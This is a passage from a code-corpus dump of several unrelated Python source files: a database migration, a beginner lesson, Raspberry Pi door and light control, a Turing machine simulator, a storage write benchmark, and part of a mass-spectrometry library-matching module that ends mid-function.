sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('like_by_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['like_by_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('topic_view',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('viewer_ip_address', sa.String(length=30), nullable=False),
sa.Column('topic_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['topic_id'], ['post.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.drop_table('topic_category')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('topic_category',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('name', sa.VARCHAR(length=150), autoincrement=False, nullable=False),
sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True),
sa.Column('status', sa.VARCHAR(length=25), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', name='topic_category_pkey'),
sa.UniqueConstraint('name', name='topic_category_name_key')
)
op.drop_table('topic_view')
op.drop_table('post_like')
op.drop_table('comment')
op.drop_table('post')
op.drop_table('post_category')
# ### end Alembic commands ###
``` |
{
"source": "jnwanya/python-basic-lesson",
"score": 4
} |
#### File: jnwanya/python-basic-lesson/variables_methods.py
```python
a = 5
b = 10
my_variable = 10
string_variable = "Hello world"
# print(string_variable)
def my_printer(param):
print(param)
def multiply_value(number_one, number_two):
return number_one * number_two
result = multiply_value(3, 5)
my_printer(result)
``` |
{
"source": "jnwarp/pi-lights",
"score": 3
} |
#### File: pi-lights/src/door.py
```python
import pigpio
import time
# set pins
default_pins = {
'motion': 3, #read data
'motion_led': 4, #output high
'door_in': 20, #read data
'door_out': 21, #output high power
}
class DoorControl():
def __init__(self, pins = default_pins):
# initialize pigpio
self.pi = pigpio.pi()
self.pins = pins
def setupPins(self):
        # Configure pins from the pin map passed to __init__ (see default_pins above).
        self.pi.set_mode(self.pins['motion'], pigpio.INPUT)
        self.pi.set_pull_up_down(self.pins['motion'], pigpio.PUD_DOWN)
        self.pi.set_mode(self.pins['motion_led'], pigpio.OUTPUT)
        self.pi.set_mode(self.pins['door_in'], pigpio.INPUT)
        self.pi.set_pull_up_down(self.pins['door_in'], pigpio.PUD_DOWN)
        self.pi.set_mode(self.pins['door_out'], pigpio.OUTPUT)
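# Minimal usage sketch; the pin names come from default_pins above and the
# polling loop below is an illustrative assumption, not part of this module:
#     door = DoorControl()
#     door.setupPins()
#     while True:
#         motion = door.pi.read(door.pins['motion'])
#         door.pi.write(door.pins['motion_led'], motion)
#         time.sleep(0.1)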
```
#### File: pi-lights/src/web.py
```python
import cherrypy
import json
import os
import pigpio
import time
import commandSend
class ControlPanel(object):
token = '<KEY>'
pi = pigpio.pi()
commands = {}
inputs = {}
outputs = {}
events = {}
def test(self, data):
print('data:', data)
def __init__(self):
self.path = '.'
# setup network
self.cmd = commandSend.CommandSend(
self.token,
url="http://172.16.16.61:8080/"
)
# add test function
self.commandAdd('test', self.test)
# set up input read
wd = cherrypy.process.plugins.BackgroundTask(2, self.inputReads)
wd.start()
def commandAdd(self, command, function):
self.commands[command] = function
print(self.commands)
@cherrypy.expose
def commandReceive(self, key, command, data = ''):
if key != self.token:
print('Error: bad key given')
return
print('Command: ', command, data)
print('Available commands: ', self.commands)
self.commands[command](data)
@cherrypy.expose
def commandSend(self, command, data = ''):
print('Sending command: ', command, data)
self.cmd.send(command, data)
@cherrypy.expose
def index(self):
return self.readFile(self.path + '/html/index.html')
def eventAdd(self, name, sensor, triggers, callback):
self.events[name] = {
'sensor': sensor,
'triggers': triggers,
'callback': callback,
'last_change': time.time(),
'last_state': None,
'executed': False
}
def eventRead(self, name):
event = self.events[name]
state = self.inputs[event['sensor']][1]
last_state = event['last_state']
if state != last_state:
event['last_state'] = state
event['last_change'] = time.time()
event['executed'] = False
self.events[name] = event
# calculate time difference
diff = time.time() - event['last_change']
trigger = event['triggers']
if trigger['state'] != state and trigger['state'] != None:
return
if trigger['diff'] > diff and trigger['diff'] != None:
return
if trigger['run_once'] and event['executed']:
return
# trigger event
self.events[name]['executed'] = True
event['callback']()
def inputAdd(self, name, pin, callback, freq = 1):
print('Input', name)
self.inputs[name] = (pin, 0, callback)
self.pi.set_mode(pin, pigpio.INPUT)
self.pi.set_pull_up_down(pin, pigpio.PUD_DOWN)
def inputRead(self, name):
pin, oldValue, callback = self.inputs[name]
newValue = self.pi.read(pin)
if oldValue != newValue:
callback(newValue)
self.inputs[name] = (pin, newValue, callback)
def inputReads(self):
while True:
time.sleep(0.1)
for item in self.inputs:
self.inputRead(item)
for event in self.events:
self.eventRead(event)
def outputAdd(self, name, pin, value=True):
print('Output', name, value)
self.outputs[name] = (pin, value)
self.pi.set_mode(pin, pigpio.OUTPUT)
self.pi.write(pin, value)
def outputSet(self, name, value):
print('Set output:', name, value)
pin, oldValue = self.outputs[name]
self.outputs[name] = (pin, value)
self.pi.write(pin, value)
def readFile(self, file):
f = open(file, 'r')
return f.read()
def startServer(self, port=8080):
conf = {
'/static': {
'tools.staticdir.root': os.path.abspath(os.getcwd()),
'tools.staticdir.on': True,
'tools.staticdir.dir': self.path + '/html'
}
}
cherrypy.config.update({'server.socket_port': port})
cherrypy.config.update({'server.socket_host': '0.0.0.0'})
cherrypy.quickstart(self, '/', conf)
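# Minimal wiring sketch for the input/output/event helpers above; the names,
# pin numbers, and trigger values are illustrative assumptions:
#     cp = ControlPanel()
#     cp.outputAdd('porch_light', 21, value=False)
#     cp.inputAdd('motion', 3, callback=lambda v: print('motion:', v))
#     cp.eventAdd('motion_on', 'motion',
#                 {'state': 1, 'diff': 0, 'run_once': True},
#                 lambda: cp.outputSet('porch_light', True))
#     cp.startServer()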
if __name__ == '__main__':
cp = ControlPanel()
cp.startServer()
``` |
{
"source": "jnwarp/turing",
"score": 4
} |
#### File: jnwarp/turing/turingmachine.py
```python
class TuringMachine:
"""
Turing Machine accepts a tape (string) and transition function.
INPUT:
tape = 'aaa'
transition_function = {
'q0': {
'a': ('q0', 'a', 'R'),
'b': ('q1', 'a', 'R'),
'*': ('qrej', '*', 'L')
},
'q1': {
'a': ('q1', 'b', 'R'),
'b': ('qacc', 'b', 'L'),
'*': ('qrej', '*', 'L')
}
}
SPECIAL STATES:
q0 = initial state
qacc = Accepts the input
qrej = Rejects the input
TRANSITION FUNCTION:
{
state: {
letter: (new_state, write_letter, L/R)
}
}
"""
def __init__(self, tape, transition_function):
# convert tape to list for iteration purposes
self.tape = list(tape)
# save inputs
self.funct = transition_function
self.state = 'q0'
self.q = -1
# print out the initial state
print('state\ttape')
print('='*12)
self.printState()
# start q at zero
self.q = 0
def printState(self, nextpos = 0):
out = ''
for i, q in enumerate(self.tape):
if i == self.q:
# optionally print direction
if nextpos > 0:
out += ' ' + q + '>'
elif nextpos < 0:
out += '<' + q + ' '
else:
out += '[' + q + ']'
else:
out += ' ' + q + ' '
print(self.state + '\t' + out)
def step(self):
# stop if state reaches acc / rej
if self.state == 'qacc':
print('\nState accepted!')
return self.state
elif self.state == 'qrej':
print('\nState rejected!')
return self.state
# select the funct to use
funct = self.funct[self.state][self.tape[self.q]]
# replace the tape element
self.state = funct[0]
self.tape[self.q] = funct[1]
# print state before head is moved
self.printState()
"""
#optionally print direction
if funct[2] == 'R':
self.printState(1)
else:
self.printState(-1)
"""
# move the head
if (funct[2] == 'R'):
self.q += 1
# append element if q goes beyond string
if len(self.tape) <= self.q:
self.tape += '*'
else:
self.q -= 1
# throw error if element tries to go too far
if self.q < 0:
                raise ValueError('Out of tape, L\n{} {}'.format(self.tape, self.funct))
def stepAll(self, limit=100):
cnt = 0
flag = True
while flag and cnt < limit:
# step one, stop if result
            result = self.step()
if (result != None):
flag = False
# prevent inf loop
cnt += 1
if flag:
print('State limit reached!')
return result
def stepPause(self):
flag = True
while flag:
# pause for user to press enter
input('')
# step one, stop if result
            result = self.step()
if (result != None):
flag = False
return result
"""
# infinite problem
transition_function = {
'q0': {
'a': ('qr', '*', 'R'),
'*': ('qr', '*', 'R')
},
'qr': {
'a': ('qr', 'a', 'R'),
'*': ('ql', 'a', 'L')
},
'ql': {
'a': ('ql', 'a', 'L'),
'*': ('qr', '*', 'R')
}
}
"""
transition_function = {
'q0': {
'a': ('q0', 'a', 'R'),
'b': ('q1', 'a', 'R'),
'*': ('qrej', '*', 'L')
},
'q1': {
'a': ('q1', 'b', 'R'),
'b': ('qacc', 'b', 'L'),
'*': ('qrej', '*', 'L')
}
}
tape = 'aba*'
t = TuringMachine(tape, transition_function)
t.stepAll()
``` |
{
"source": "jnwatson/synapse-perf",
"score": 3
} |
#### File: synapse-perf/write_test/write_test.py
```python
import time
import os
import struct
import sqlite3
from binascii import hexlify
from typing import Union
import base64
import psutil # type: ignore
import lmdb # type: ignore
from numpy import random # type: ignore
import psycopg2 # type: ignore
import synapse.cortex as s_cortex # type: ignore
_SIZET_ST = struct.Struct('@Q')
class SqliteWriter:
def __init__(self, filename: str, already_exists: bool, use_sqlite_wal: bool) -> None:
self.conn = sqlite3.connect(filename)
if not already_exists:
self.conn.execute('CREATE TABLE t(key INTEGER PRIMARY KEY ASC, val BLOB);')
self.conn.commit()
if use_sqlite_wal:
self.conn.execute('PRAGMA journal_mode=WAL;')
self.label = 'sqlite_wal'
else:
self.label = 'sqlite'
def write(self, data: bytes, batch_size: int) -> None:
self.conn.executemany('INSERT INTO t VALUES (?, ?)',
((_SIZET_ST.unpack(random.bytes(7)+b'\0')[0], data) for j in range(batch_size)))
self.conn.commit()
def close(self):
self.conn.close()
class PostgresqlWriter(SqliteWriter):
def __init__(self, delete_first: bool) -> None:
self.conn = psycopg2.connect("host='localhost' dbname='db' user='synapse' password='<PASSWORD>'")
self.curs = self.conn.cursor()
if delete_first:
self.curs.execute('DROP TABLE IF EXISTS t;')
self.curs.execute('DROP TABLE IF EXISTS synapsetable;')
self.curs.execute('DROP TABLE IF EXISTS synapsetable_blob;')
self.curs.execute('CREATE TABLE t(key BIGINT PRIMARY KEY, val BYTEA);')
self.conn.commit()
self.label = 'postgres'
def write(self, data: bytes, batch_size: int) -> None:
self.curs.executemany('INSERT INTO t VALUES (%s, %s)',
((_SIZET_ST.unpack(random.bytes(7)+b'\0')[0], data) for j in range(batch_size)))
self.conn.commit()
def close(self):
self.curs.close()
self.conn.close()
class LmdbWriter:
def __init__(self, filename: str) -> None:
MAP_SIZE = 20 * 1024 * 1024 * 1024
self.env = lmdb.Environment(filename, map_size=MAP_SIZE, subdir=False, metasync=False, sync=True,
readahead=False, max_dbs=4, writemap=True, meminit=False, lock=True)
self.db = self.env.open_db(key=b'data', integerkey=True)
self.label = 'lmdb'
def write(self, data: bytes, batch_size: int) -> None:
with self.env.begin(write=True, buffers=True, db=self.db) as txn:
for j in range(batch_size):
# rv = txn.put(key_enc, data, dupdata=False, overwrite=False, db=db)
rv = txn.put(random.bytes(8), data, dupdata=False, overwrite=False, db=self.db)
assert rv
def close(self) -> None:
self.env.close()
class SynapseWriter:
def __init__(self, filename: str, *, use_sqlite: bool, use_postgres: bool, delete_first: bool,
use_sqlite_wal=False) -> None:
print(self)
if use_sqlite or use_sqlite_wal:
url = 'sqlite:///' + filename
if use_sqlite_wal:
self.label = 'syn_sqlite_wal'
else:
self.label = 'syn_sqlite'
elif use_postgres:
url = 'postgres://synapse:synapse@localhost/db/synapsetable'
self.label = 'syn_postgres'
if delete_first:
self._drop_synapse_table()
else:
url = 'lmdb:///' + filename
self.label = 'syn_lmdb'
self.core = s_cortex.openurl(url)
if use_sqlite_wal:
db = self.core.store.dbpool.get()
db.execute('PRAGMA journal_mode=WAL;')
self.core.store.dbpool.put(db)
def _drop_synapse_table(self):
conn = psycopg2.connect("host='localhost' dbname='db' user='synapse' password='<PASSWORD>'")
curs = conn.cursor()
curs.execute('DROP TABLE IF EXISTS synapsetable;')
curs.execute('DROP TABLE IF EXISTS synapsetable_blob;')
curs.execute('DROP TABLE IF EXISTS t;')
conn.commit()
curs.close()
conn.close()
def write(self, data: bytes, batch_size: int) -> None:
rows = []
val = base64.a85encode(data).decode('ascii')
prop = 'propname'
for i in range(batch_size):
iden = hexlify(random.bytes(16)).decode('utf8')
timestamp = random.randint(1, 2 ** 63)
rows.append((iden, prop, val, timestamp))
self.core.addRows(rows)
def close(self) -> None:
pass
def make_db(*, size_in_mb: int, delete_first: bool, filename: str, use_sqlite=False, use_postgresql=False,
use_synapse=False, use_sqlite_wal=False):
me = psutil.Process()
if (use_sqlite and use_postgresql) or (use_sqlite_wal and use_postgresql):
raise Exception('Invalid parameters.')
if delete_first and not use_postgresql:
try:
os.unlink(filename)
except OSError:
pass
already_exists = os.path.exists(filename)
else:
already_exists = False
if use_synapse:
writer: Union[SynapseWriter, SqliteWriter, LmdbWriter] = \
SynapseWriter(filename, use_sqlite=use_sqlite, use_sqlite_wal=use_sqlite_wal, use_postgres=use_postgresql,
delete_first=delete_first)
elif use_sqlite:
writer = SqliteWriter(filename, already_exists, use_sqlite_wal=use_sqlite_wal)
elif use_postgresql:
writer = PostgresqlWriter(delete_first)
else:
writer = LmdbWriter(filename)
print("Starting write test for %s" % writer.label)
if already_exists:
print("Using existing DB")
total_size = size_in_mb * 1024 * 1024
DATA_SIZE = 1024
BATCH_SIZE = 128
data = b'\xa5' * DATA_SIZE
key = last_key = first_key = random.randint(0, 2**63-1)
last_now = start_time = time.time()
for i in range(total_size // DATA_SIZE // BATCH_SIZE):
if i % 512 == 0:
print('uss=%dMiB' % (me.memory_full_info().uss // 1024 // 1024))
now = time.time()
if i > 0:
mib = DATA_SIZE * (key - first_key) / 1024 / 1024
mib_s = (DATA_SIZE * (key - last_key) / 1024 / 1024)/(now - last_now)
print('MiB=%.1f, MiB/s=%.3f' % (mib, mib_s))
print('> {"%s": {"mib": %d, "mib_s": %.3f}}' % (writer.label, mib, mib_s))
last_key = key
last_now = now
writer.write(data, BATCH_SIZE)
key += BATCH_SIZE
writer.close()
now = time.time()
mib = DATA_SIZE * (key - first_key) / 1024 / 1024
mib_s = mib/(now - start_time)
print('Cum MiB=%.2f, MiB/s=%.2f' % (mib, mib_s))
print('> {"%s cum": {"mib": %d, "mib_s": %.3f}}' % (writer.label, mib, mib_s))
def main():
parser = argparse.ArgumentParser(description="Write a database")
parser.add_argument("--delete-first", action='store_true')
parser.add_argument("--use-sqlite", action='store_true')
parser.add_argument("--use-sqlite-wal", action='store_true')
parser.add_argument("--use-postgresql", action='store_true')
parser.add_argument("--use-synapse", action='store_true')
parser.add_argument("filename")
parser.add_argument("size_in_mb", type=int)
args = parser.parse_args()
make_db(**vars(args))
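# Minimal command-line sketch; the target file and size are illustrative only:
#     python write_test.py --use-synapse --delete-first /tmp/test.lmdb 64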
if __name__ == '__main__':
    main()
``` |
{
"source": "jnwei/deep-molecular-massspec",
"score": 2
} |
#### File: jnwei/deep-molecular-massspec/library_matching.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
from os import path
import feature_map_constants as fmap_constants
import mass_spec_constants as ms_constants
import util
import numpy as np
import tensorflow as tf
FP_NAME_FOR_JACCARD_SIMILARITY = str(
ms_constants.CircularFingerprintKey(fmap_constants.CIRCULAR_FP_BASENAME,
1024, 2))
# When filtering the library matching candidates on a per-query basis, we
# set the query-library element similarity to this value for the elements
# that were filtered.
_SIMILARITY_FOR_FILTERED_ELEMENTS = -100000
_KEY_FOR_LIBRARY_VECTORS = fmap_constants.DENSE_MASS_SPEC
def _validate_data_dict(data_dict, name):
if data_dict is None:
return
for key in [
FP_NAME_FOR_JACCARD_SIMILARITY, fmap_constants.INCHIKEY,
_KEY_FOR_LIBRARY_VECTORS, fmap_constants.MOLECULE_WEIGHT
]:
if key not in data_dict:
raise ValueError('input dataset with name %s '
'must have field %s' % (name, key))
class LibraryMatchingData(
namedtuple('LibraryMatchingData', ['observed', 'predicted', 'query'])):
"""Data for library matching evaluation.
All input data dictionaries must have the following keys:
fmap_constants.INCHIKEY, fmap_constants.DENSE_MASS_SPEC,
and all keys in fmap_constants.FINGERPRINT_LIST
Args:
observed: data put into the library using true observed spectra.
predicted: data put into the library using the output of a predictive model
applied to the data's molecules.
query: data containing observed spectra used to issue queries to the
library.
"""
def __new__(cls, observed, predicted, query):
_validate_data_dict(observed, 'observed')
_validate_data_dict(predicted, 'predicted')
_validate_data_dict(query, 'query')
return super(LibraryMatchingData, cls).__new__(cls, observed, predicted,
query)
def _invert_permutation(perm):
"""Convert an array of permutations to an array of inverse permutations.
Args:
    perm: a [batch_size, num_items] int array where each column is a
permutation.
Returns:
    A [batch_size, num_items] int array where each column is the
inverse permutation of the corresponding input column.
"""
output = np.empty(shape=perm.shape, dtype=perm.dtype)
output[np.arange(perm.shape[0])[..., np.newaxis], perm] = np.arange(
perm.shape[1])[np.newaxis, ...]
return output
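# Worked example for _invert_permutation: perm = [[2, 0, 1]] maps to
# [[1, 2, 0]], since value 0 appears at index 1, value 1 at index 2, and
# value 2 at index 0 of the input row.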
def _find_query_rank_helper(similarities, library_keys, query_keys):
"""Find rank of query key when we sort library_keys by similarities.
Note that the behavior of this function is not well defined when there
are ties along a row of similarities.
Args:
similarities: [batch_size, num_library_elements] float array. These are not
assumed to be sorted in any way.
library_keys: [num_library_elements] string array, where each column j of
similarities corresponds to library_key j.
query_keys: [num_queries] string array.
Returns:
highest_rank: A [batch_size] tf.int32 np array containing
for each batch the highest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score.
lowest_rank: similar to highest_rank, but the lowest index of a library key
      matching the query.
avg_rank: A [batch_size] tf.float32 array containing the average index
of all library keys matching the query.
best_query_similarities: the value of the similarities evaluated at
the lowest_rank position.
Raises:
ValueError: if there is a query key does not exist in the set of library
keys.
"""
def _masked_rowwise_max(data, mask):
data = np.copy(data)
min_value = np.min(data) - 1
data[~mask] = min_value
return np.max(data, axis=1)
def _masked_rowwise_min(data, mask):
data = np.copy(data)
max_value = np.max(data) + 1
data[~mask] = max_value
return np.min(data, axis=1)
def _masked_rowwise_mean(data, mask):
masked_data = data * mask
rowwise_value_sum = np.float32(np.sum(masked_data, axis=1))
rowwise_count = np.sum(mask, axis=1)
return rowwise_value_sum / rowwise_count
library_key_matches_query = (
library_keys[np.newaxis, ...] == query_keys[..., np.newaxis])
if not np.all(np.any(library_key_matches_query, axis=1)):
raise ValueError('Not all query keys appear in the library.')
ranks = _invert_permutation(np.argsort(-similarities, axis=1))
highest_rank = _masked_rowwise_max(ranks, library_key_matches_query)
lowest_rank = _masked_rowwise_min(ranks, library_key_matches_query)
avg_rank = _masked_rowwise_mean(ranks, library_key_matches_query)
highest_rank = np.int32(highest_rank)
lowest_rank = np.int32(lowest_rank)
avg_rank = np.float32(avg_rank)
best_query_similarities = _masked_rowwise_max(similarities,
library_key_matches_query)
return (highest_rank, lowest_rank, avg_rank, best_query_similarities)
def _find_query_rank(similarities, library_keys, query_keys):
"""tf.py_func wrapper around _find_query_rank_helper.
Args:
similarities: [batch_size, num_library_elements] float Tensor. These are not
assumed to be sorted in any way.
library_keys: [num_library_elements] string Tensor, where each column j of
similarities corresponds to library_key j.
query_keys: [num_queries] string Tensor
Returns:
query_ranks: a dictionary with keys 'highest', 'lowest' and 'avg', where
each value is a [batch_size] Tensor. The 'lowest' Tensor contains
for each batch the lowest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score. The 'highest' and 'avg'
Tensors are defined similarly. The first two are tf.int32 and the
final is a tf.float32.
Note that the behavior of these metrics is undefined when there are ties
within a row of similarities.
best_query_similarities: the value of the similarities evaluated at
the lowest query rank.
"""
(highest_rank, lowest_rank, avg_rank, best_query_similarities) = tf.py_func(
_find_query_rank_helper, [similarities, library_keys, query_keys],
(tf.int32, tf.int32, tf.float32, tf.float32),
stateful=False)
query_ranks = {
'highest': highest_rank,
'lowest': lowest_rank,
'avg': avg_rank
}
return query_ranks, best_query_similarities
def _max_similarity_match(library,
query,
similarity_provider,
library_filter=None,
library_keys=None,
query_keys=None):
"""Find maximum similarity between query and library vectors.
All queries and library elements are associated with a key. We require that
each query key exists in the library. In other words, the ground truth id
of the query is in the library. We optionally return additional data
about how similar the library element for the ground truth was to the query.
Args:
library: [num_elements, feature_dim] Tensor
query: [num_queries, feature_dim] Tensor
similarity_provider: a similarity.SimilarityProvider instance
library_filter: [num_elements, num_queries] Bool Tensor. Query j is
permitted to be matched to library element i if library_filter[i, j] is
True. Unused if None.
library_keys: tf.string Tensor of the ids of the library elements
query_keys: tf.string Tensor of the ids of the queries
Returns:
argmax: [num_queries] tf.int32 Tensor containing indices of maximum inner
product between each query and the library.
best_similarities: [num_queries] tf.float32 Tensor containing the value of
the maximum inner products.
query_ranks: a dictionary with keys 'highest', 'lowest' and 'avg', where
each value is a [batch_size] Tensor. The 'lowest' Tensor contains
for each batch the lowest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score. The 'highest' and 'avg'
Tensors are defined similarly. The first two are tf.int32 and the
final is a tf.float32.
Note that the behavior of these metrics is undefined when there are ties
within a row of similarities.
query_similarities: [num_queries] corresponding similarities for the
'lowest' ranks in query_ranks above.
library_entry_of_predictions: [num_queries, feature_dim] Tensor
"""
similarities = similarity_provider.compute_similarity(library, query)
if library_filter is not None:
error_tensors = [
'For some query, all elements of the library were '
'removed by filtering.'
]
if query_keys is not None:
error_tensors.append(query_keys)
assert_op = tf.Assert(
tf.reduce_all(tf.reduce_any(library_filter, axis=0)), error_tensors)
with tf.control_dependencies([assert_op]):
library_filter = tf.transpose(library_filter, (1, 0))
similarities = tf.where(
library_filter, similarities,
_SIMILARITY_FOR_FILTERED_ELEMENTS * tf.ones_like(similarities))
argmax = tf.argmax(similarities, axis=1)
row_indices = tf.range(0, tf.shape(argmax)[0])
argmax_with_indices = tf.stack(
[row_indices, tf.cast(argmax, tf.int32)], axis=1)
best_similarities = tf.gather_nd(similarities, argmax_with_indices)
library_entry_of_prediction = tf.gather(library, argmax)
library_entry_of_prediction = similarity_provider.undo_library_preprocessing(
library_entry_of_prediction)
if library_keys is not None and query_keys is not None:
if library_keys.shape.ndims == 2:
library_keys = tf.squeeze(library_keys, axis=1)
if query_keys.shape.ndims == 2:
query_keys = tf.squeeze(query_keys, axis=1)
query_ranks, query_similarities = _find_query_rank(similarities,
library_keys, query_keys)
else:
query_similarities = None
query_ranks = None
return (argmax, best_similarities, query_ranks, query_similarities,
library_entry_of_prediction)
def _make_library(predicted_dict,
predictor_fn,
observed_dict,
eval_batch_size,
similarity_provider,
name='library'):
"""Make idempotent [num_elements, library_entry_length] library Tensor."""
def _get_library_shape(predicted_dict, observed_library):
"""Infer the shape of the library from the observed and predicted data."""
if observed_library is None:
prediction_shape = util.get_static_shape_without_adding_ops(
predicted_dict, predictor_fn)
library_entry_length = prediction_shape[1]
num_elements_observed = 0
else:
(num_elements_observed,
library_entry_length) = observed_library.shape.as_list()
# Having a statically-inferrable batch size is required, since we need to
# know the exact shape of the constructed library at graph construction
# time, since it will be stored in a tf.Variable.
assert num_elements_observed is not None, ('batch_size must be '
'statically inferrable for '
'the observed data.')
num_elements = num_elements_observed
if predicted_dict is not None:
num_elements_predicted = tf.contrib.framework.nest.flatten(
predicted_dict)[0].shape[0]
assert num_elements_predicted is not None, ('batch_size must be '
'statically inferrable for '
'the predicted data.')
num_elements += num_elements_predicted
return [num_elements, library_entry_length]
if observed_dict is not None:
observed_library = observed_dict[_KEY_FOR_LIBRARY_VECTORS]
else:
observed_library = None
if predicted_dict is not None:
library_shape = _get_library_shape(predicted_dict, observed_library)
# The library may require expensive computation to construct. Therefore
# at evaluation time we do this computation once and cache the result in a
# Variable. The first function below allocates this Variable. The second
# creates the potentially-expensive operation for setting the Variable to
# the desired value.
def make_value_op():
# It's important to use a local variable rather than a global Variable.
# Global variables get restored from checkpoints. This would be bad here,
# since we want to recompute the library with respect to the predictions
# of the current model.
return tf.get_local_variable(
name=name,
shape=library_shape,
dtype=tf.float32,
initializer=tf.zeros_initializer)
def make_init_op(value_op):
prediction = util.map_predictor(
predicted_dict, predictor_fn, sub_batch_size=eval_batch_size)
if observed_dict is not None:
library = tf.concat([prediction, observed_library], axis=0)
else:
library = prediction
normalized_library = similarity_provider.preprocess_library(library)
return value_op.assign(normalized_library)
full_library = util.value_op_with_initializer(make_value_op, make_init_op)
else:
full_library = similarity_provider.preprocess_library(observed_library)
def _get_ids_fingerprints_and_masses(data_dict):
if data_dict is None:
return [], [], []
ids = data_dict[fmap_constants.INCHIKEY]
if ids.shape[0] == 0:
return [], [], []
fingerprints = data_dict[FP_NAME_FOR_JACCARD_SIMILARITY]
masses = tf.squeeze(data_dict[fmap_constants.MOLECULE_WEIGHT], axis=1)
return [ids], [fingerprints], [masses]
(predicted_ids, predicted_fingerprints,
predicted_masses) = _get_ids_fingerprints_and_masses(predicted_dict)
(observed_ids, observed_fingerprints,
observed_masses) = _get_ids_fingerprints_and_masses(observed_dict)
full_library_ids = tf.concat(predicted_ids + observed_ids, axis=0)
full_fingerprints = tf.concat(
predicted_fingerprints + observed_fingerprints, axis=0)
full_masses = tf.concat(predicted_masses + observed_masses, axis=0)
return full_library, full_library_ids, full_fingerprints, full_masses
def library_matching(combined_data,
predictor_fn,
similarity_provider,
mass_tolerance,
eval_batch_size=500):
"""Classify query spectra using a library of observed and predicted spectra.
We first construct a library of spectra by merging a set of observed spectra
with a set of spectra that are generated synthetically using a predictive
model. Each spectrum in the library is associated with a the id of the true
molecule that it is associated with.
Next, we stream over a set of query spectra and compute the cosine similarity
between the each query and each element of the library. For each query, we
output the id of the library spectrum that it is most similar to.
Args:
combined_data: a LibraryMatchingData instance
predictor_fn: a callable that takes such a data dict and returns a predicted
spectrum.
similarity_provider: A similarity.SimilarityProvider instance.
mass_tolerance: library elements are only considered as candidate
matches if their mass is within this much of the query mass. If None,
no filtering is performed.
eval_batch_size: int for the batch size to use when predicting spectra to
include in the library.
Returns:
true_ids: string Tensor containing the ground truth ids for the queries.
predicted_ids: string Tensor contain the ids of the elements of the library
that the queries were matched to.
library_entry_of_prediction: float Tensor containing the library spectra
that is the best match for the query
num_library_elements: int
"""
observed_dict = combined_data.observed
predicted_dict = combined_data.predicted
query_dict = combined_data.query
(full_library, full_library_ids, full_fingerprints,
full_masses) = _make_library(predicted_dict, predictor_fn, observed_dict,
eval_batch_size, similarity_provider)
true_ids = query_dict[fmap_constants.INCHIKEY]
query = similarity_provider.preprocess_queries(
query_dict[fmap_constants.DENSE_MASS_SPEC])
if mass_tolerance is not None:
query_masses = tf.squeeze(
query_dict[fmap_constants.MOLECULE_WEIGHT], axis=1)[tf.newaxis, ...]
full_masses = full_masses[..., tf.newaxis]
library_filter = tf.abs(query_masses - full_masses) <= mass_tolerance
else:
library_filter = None
(library_match_indices, best_similarities, query_ranks,
query_similarities, library_entry_of_prediction) = _max_similarity_match(
full_library, query, similarity_provider, library_filter,
full_library_ids, true_ids)
predicted_ids = tf.gather(full_library_ids, library_match_indices)
true_fingerprints = query_dict[FP_NAME_FOR_JACCARD_SIMILARITY]
predicted_fingerprints = tf.gather(full_fingerprints, library_match_indices)
true_data = {
fmap_constants.INCHIKEY: true_ids,
FP_NAME_FOR_JACCARD_SIMILARITY: true_fingerprints,
'similarity': query_similarities,
'rank': query_ranks
}
predicted_data = {
fmap_constants.INCHIKEY: predicted_ids,
FP_NAME_FOR_JACCARD_SIMILARITY: predicted_fingerprints,
'similarity': best_similarities,
}
num_library_elements = full_library_ids.shape[0].value
return (true_data, predicted_data, library_entry_of_prediction,
num_library_elements)
def _log_predictions(true_keys, predicted_keys, ranks, global_step, log_dir):
output_file = path.join(log_dir,
'%d.library_matching_predictions.txt' % global_step)
with tf.gfile.Open(output_file, 'w') as f:
for true_key, predicted_key, rank in zip(true_keys, predicted_keys, ranks):
f.write('%s %s %d\n' % (true_key[0], predicted_key[0], rank))
return np.int32(0)
def _make_logging_ops(true_keys, predicted_keys, ranks, log_dir):
"""tf.metrics-compatible ops for saving and logging results."""
all_true_keys = []
all_predicted_keys = []
all_ranks = []
def _extend_keys(true_batch_keys, predicted_batch_keys, batch_ranks):
all_true_keys.extend(true_batch_keys)
all_predicted_keys.extend(predicted_batch_keys)
all_ranks.extend(batch_ranks)
return np.int32(0)
update_op = tf.py_func(_extend_keys, [true_keys, predicted_keys, ranks],
[tf.int32])[0]
def _write_log_to_file(global_step):
return _log_predictions(all_true_keys, all_predicted_keys, all_ranks,
global_step, log_dir)
value_op = tf.py_func(_write_log_to_file,
[tf.train.get_or_create_global_step()], [tf.int32])[0]
return (value_op, update_op)
def library_match_accuracy(combined_data,
predictor_fn,
eval_batch_size,
similarity_provider,
mass_tolerance,
log_dir=None):
"""Compute top-1 library matching accuracy.
See library_matching() for details of the library matching process.
Args:
combined_data: a LibraryMatchingData instance
predictor_fn: a callable that takes such a dict and returns a predicted
spectrum.
eval_batch_size: int for the batch size to use when predicting spectra to
include in the library.
similarity_provider: a similarity.SimilarityProvider instance
mass_tolerance: (Float) library elements are only considered as candidate
matches if their mass is within this much of the query mass.
log_dir: (optional) if provided, log predictions here.
Returns:
metrics_dict: A dict where each value is a tuple containing an
Estimator-compatible value_op and update_op.
library_entry_of_prediction: Float tensor of spectra from library which
had the best match for each query spectra
inchikeys: Tensor of strings that are the inchikeys of the spectra in
library_entry_of_prediction.
"""
(true_data, predicted_data,
